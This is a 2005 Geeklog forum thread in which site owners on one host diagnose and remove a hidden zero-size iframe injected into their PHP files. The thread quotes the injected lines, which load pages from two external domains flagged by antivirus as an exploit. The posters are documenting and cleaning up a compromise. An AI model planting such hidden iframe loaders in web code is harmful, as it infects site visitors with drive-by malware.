Subject: unusual iframe on my site

Posted on: 25/03/05 05:38pm
By: usarfans

Today I noticed something unusual when my site loaded. Down in the bottom status bar of IE, I noticed that it was trying to load something from a site NOT of my knowledge. I did a "view source" and found the culprit about 3/4 of the way through the index.php outputted file. It is right before the part at the bottom of the page where you are given links to previous site pages.

Here is the part in question:

<!-- ARTICLE END -->

<iframe src=<b>http://europedirect.biz/frame.php</b> 
frameboarder="0" width="0" height="0" scrolling="no">
</iframe><div class="pagenav">Previous <b>1</b> 


Any ideas what this means? Has the site been hacked? I had plans on upgrading the site to 3.11 this weekend but am not sure if I should yet until I can figure out where this europedirect.biz link came from.

Thanks,

Lou


unusual iframe on my site

Posted on: 25/03/05 05:51pm
By: ScurvyDawg

Thats odd

Do others have access to your layout folder?

You will want to change your passwords.

If you go to the site there is nothing there really except some stats scripts. I would remove the code of course too. Did you get the theme off of somone maybe it is just old code?

Good Luck

unusual iframe on my site

Posted on: 25/03/05 05:55pm
By: Dirk

Can you find that IFRAME in the theme files on your webspace? Since the page navigation is added on the fly, it should be in the story templates (storytext.thtml or storybodytext.thtml).

If you can't find it there, it may be inserted by a control in your browser. Are you using Internet Explorer?

bye, Dirk

unusual iframe on my site

Posted on: 25/03/05 06:31pm
By: usarfans

ScurvyDawg & Dirk,

Thanks for your fast replies.

To the best of my knowledge, nobody but myself has access to the htdocs/layout folder. Permissions are set to 755.

I am using IE, but I see the same thing using Slimbrowser.

I am basically using the Smooth Blue theme with just a couple of minor color tweeks.

I opened each file in the theme directory (not it's subdirectories) and did not find the odd iframe info in any of them.

The only plug-in I am using is the static pages plugin.

When I select a story to read and go to the story page and view the source, the mysterious Iframe is NOT there. It appears to only be on the main index.php page or process.

Still looking at other files..

unusual iframe on my site

Posted on: 25/03/05 06:36pm
By: Dirk

[QUOTE BY= usarfans] I am using IE, but I see the same thing using Slimbrowser.[/QUOTE]
I'm not familiar with Slimbrowser, but from their website it looks like they're still using Internet Explorer as a backend.

Try a different browser, e.g. Firefox or Opera.

bye, Dirk

unusual iframe on my site

Posted on: 25/03/05 06:49pm
By: usarfans

I loaded Firefox 1.0.2.

Same results - suspect Iframe still seen. Going to try on a different computer now, although all logic says that is not the problem......

unusual iframe on my site

Posted on: 25/03/05 06:52pm
By: ScurvyDawg

I am using firefox and I see it.

Seems to be part of your site navigation the previous button??


<iframe src=http://europedirect.biz/frame.php frameboarder="0" width="0" height="0" scrolling="no"></iframe>
<div class="pagenav">Previous <b>1</b> 
<a href="http://www.usarfans.com/index.php?page=2">2</a> 
<a href="http://www.usarfans.com/index.php?page=3">3</a> 
<a href="http://www.usarfans.com/index.php?page=4">4</a> 
<a href="http://www.usarfans.com/index.php?page=5">5</a> 
<a href="http://www.usarfans.com/index.php?page=6">6</a> 
<a href="http://www.usarfans.com/index.php?page=7">7</a> 
<a href="http://www.usarfans.com/index.php?page=8">8</a> 
<a href="http://www.usarfans.com/index.php?page=9">9</a> 
<a href="http://www.usarfans.com/index.php?page=10">10</a> 
<a href="http://www.usarfans.com/index.php?page=2">Next</a>
</div>
</td>




Very strange it is right next to your pagination? Seems to be tracking stats??

unusual iframe on my site

Posted on: 25/03/05 06:54pm
By: ScurvyDawg

Yep if you look at your pagination it is there.

a little square next to or above the word previous.

unusual iframe on my site

Posted on: 25/03/05 07:02pm
By: Dirk

I can see it, too.

It doesn't appear to be in the template files. It's also not visible on other pages that use the pagination (e.g. the links).

So it may actually be in your index.php. Make a backup of that file (for forensic analysis), then overwrite it with a fresh copy. See if that helps ...

bye, Dirk

unusual iframe on my site

Posted on: 25/03/05 07:07pm
By: usarfans

I don't see the little square (old eyes) but I know that I did not put anything extra like this europedirect.biz iframe into my site code. And if you guys, who have seen a million Geeklog problems, don't recognize it - it only leads me to believe it is malicious in nature somehow.

unusual iframe on my site

Posted on: 25/03/05 07:35pm
By: usarfans

found the culprit! How I missed it earlier is beyond me.

The index.php file had been modified about 2 days ago and not by myself. I replaced it and the iframe is gone.

All root/admin passwords have been changed. Upgrade is in the very,very near future.

Comparing the bad with the good, the only difference is this one line of code

$display .= '<iframe src=http://europedirect.biz/frame.php 
frameboarder="0" width="0" height="0" scrolling="no"></iframe>'

I guess I was hacked. Dammit.

Thanks for the rapid and accurate help. We non-geeks really appreciate it - especially when it's obvious we are in over our heads!



unusual iframe on my site

Posted on: 26/03/05 02:53am
By: Dirk

[QUOTE BY= usarfans] I guess I was hacked. Dammit.[/QUOTE]
It is very unlikely that this was done via Geeklog or any other script you may have running. So better change the passwords for your hosting account as well.

bye, Dirk

unusual iframe on my site

Posted on: 07/04/05 03:38pm
By: rav

I just discovered the exact same thing! I fixed it before I found this thread, and wondered if anyone else had run into the problem. Appears I'm not the only one.

unusual iframe on my site

Posted on: 07/04/05 03:40pm
By: rav

Interesting to note, that my file was changed on March 23rd as well.

unusual iframe on my site

Posted on: 07/04/05 04:06pm
By: beewee

Do you happen to have the same hosting provider?

unusual iframe on my site

Posted on: 07/04/05 06:15pm
By: usarfans


I am using PSekhosting.com

Every since the original owner of PSek sold (i.e. outsourced) the site a couple of months ago I've had numerous problem with them - SQL crashes, DNS issues, etc. Not a lick of problem before the sale.


Lou

unusual iframe on my site

Posted on: 08/04/05 07:23am
By: rav

I'm using psek as well. I have several sites hosted with them, but only one has been affected.

unusual iframe on my site

Posted on: 08/04/05 09:37am
By: beewee

Did you ever change the passwords you received from Psek? If not, somebody retrieved the passwords or found out how their passwords are generated.

If you did change them, your sites might be vulnerable...

unusual iframe on my site

Posted on: 08/04/05 09:40am
By: rav

Yeah, I changed the passwords from what psek sent me. I submitted a ticket to pske's support and they suggested that it was my geeklog version (still on 1.3. and that I should upgrade. Something I had planned on doing anyway, just haven't had the time yet.

unusual iframe on my site

Posted on: 08/04/05 09:46am
By: beewee

Perhaps it's just my imagination: did you install GL yourself or with you Control Panel? It's quite easy to pack an 'infected' template that way...

BTW there should be a FTP access log somewhere.

unusual iframe on my site

Posted on: 08/04/05 10:28am
By: rav

Installed it myself. I have 4 templates installed, but I haven't touched any of them in quite sometime. The site has been running smoothly for almost 2 years now. It was the main index.php file that was modified, not any of the layout files.

I'll go back through and look at the FTP logs.

unusual iframe on my site

Posted on: 02/05/05 12:49pm
By: keystone

I'm using PSEK and my site has been hacked twice. The first time the iframe code was inserted in the index.php and index.html.

This time the iframe code was inserted in Lib-common.php.

I've changed my passwords now a couple of times.

unusual iframe on my site

Posted on: 02/05/05 01:14pm
By: rav

Yeah, I just had the EXACT same thing happen to me. First time was in index.php - and this last firday, found it in the lib-common.php - I am also hosted at psek.com

Think I'm gonna start looking for a new host. They are getting expensive and the quality has gone down since the sale of psek and I've been hacked TWICE now in the short time they have taken over.

When I asked their support, the simply blamed in on geeklog. I was on an older version (1.3. so I upgrade and now I'm on 1.3.11.

What version of GL were you running when they hacked you?

unusual iframe on my site

Posted on: 02/05/05 01:17pm
By: usarfans

I'm starting to believe it's an inside job from some person at PSek.com

My lib-commpn.php file was hacked on 4/29.05 @11:27 am. I bet if you check, your's was done at the same time.

This time this code was added to the file -->

<iframe src=http://vipcontact.net/adbanner.php frameborder="0" width="0" height="0" scrolling="no"></iframe>


It caused Symantec, Trend Micro, and McAfee to alert on it as being a "JAVA_BYTEVER.A" or "Exploit-ByteVerify" Virus.

These recent problems HAVE to be form someone with specific knowledge of Geeklog and the ability to modify system files.

Anybody recommend another ISP????

Lou


unusual iframe on my site

Posted on: 02/05/05 03:36pm
By: Anonymous

The problem that you are describing is the result of a client with an insecure script which allowed a remote user to injext a malicious code which in turn affected a few pSek accounts using this Geeklog script. Only accounts using Geeklog were affected so we're still trying to track down the cause.


unusual iframe on my site

Posted on: 02/05/05 03:59pm
By: keystone

[QUOTE BY= rav] Yeah, I just had the EXACT same thing happen to me. First time was in index.php - and this last firday, found it in the lib-common.php - I am also hosted at psek.com

Think I'm gonna start looking for a new host. They are getting expensive and the quality has gone down since the sale of psek and I've been hacked TWICE now in the short time they have taken over.

When I asked their support, the simply blamed in on geeklog. I was on an older version (1.3. so I upgrade and now I'm on 1.3.11.

What version of GL were you running when they hacked you?[/QUOTE]
I'm running an older version and will upgrade. Did it happen after you upgraded to 1.3.11?

unusual iframe on my site

Posted on: 02/05/05 04:02pm
By: keystone

Also, my geeklog site is password protected at the web server level. So a user has to authenticate to the web server prior to getting access to geeklog.

In my case, the hacker would have had to have cracked that password as well in order to even run a malicious GL script.

Seems to me that there may be an issue at the PSEK hosting level...

unusual iframe on my site

Posted on: 02/05/05 05:05pm
By: usarfans

[QUOTE BY= keystone] I'm running an older version and will upgrade. Did it happen after you upgraded to 1.3.11?[/QUOTE]

The first hack occured when I was still running an older verion of GL. The hack from Friday was AFTER I had upgraded to 1.3.11.

Lou

unusual iframe on my site

Posted on: 02/05/05 05:06pm
By: rav

no, I was running 1.3.8 both times I got hacked. I'm at 1.3.11 now.

unusual iframe on my site

Posted on: 02/05/05 05:39pm
By: frisco3

Hi all! I have been having the same problem on the psek server called "knicks" I'm curious if everyone else is on the same server. You can see your server name by going to www.yourwebsite.com/cpanel and looking at the section in the bottom right (Generel Server Information).

I had the malicious code for vipcontact.net in my lib-common file. I removed the malicious code and everything seems to be fine now.

Psek has been pretty good about this issue with me. They admit they are still looking into the cause and say it's because one of their clients uploaded malicious code that then infected the server somehow, but that they've isolated the outbreak. They have given no indication that the file was loaded intentionally by the client or if there was a third party involved.

Note that Brandon Mizrahie above is from psek and I alerted him of this thread earlier today. His quote above is a reply to a support ticket I sent to him.

unusual iframe on my site

Posted on: 03/05/05 07:10am
By: usarfans

Here is the response I got last night from PSek as the closed out the trouble ticket. Make any sense you any of you ????


the problem is completely isolated and solved. but we strongly recomend to all our customers to download and install official MicroSoft antispyware tool and do the local box full scan to get rid of any sort of spyware:

http://www.microsoft.com/downloads/details.aspx?FamilyID=321cd7a2-6a57-4c57-a8bd-dbf62eda9671&displaylang=en


Lou

unusual iframe on my site

Posted on: 03/05/05 12:46pm
By: rav

They are just warning users to have some sort of anti-spyware / anti-virus software installed on their systems. I have both of course, or I would have NEVER known that there was a problem in the first place.

Some of my users got infected though and they thought it was MY site that was doing it to them.

Support kept telling me that it was the version of GL that I was running. So I upgraded it (which needed to be done anyway ). The fact that you've been affected even after upgrading to 1.3.11 is concerning.

If it happens again, I'm switching hosts.

Geeklog - Forum
https://www.geeklog.net/forum/viewtopic.php?showtopic=50236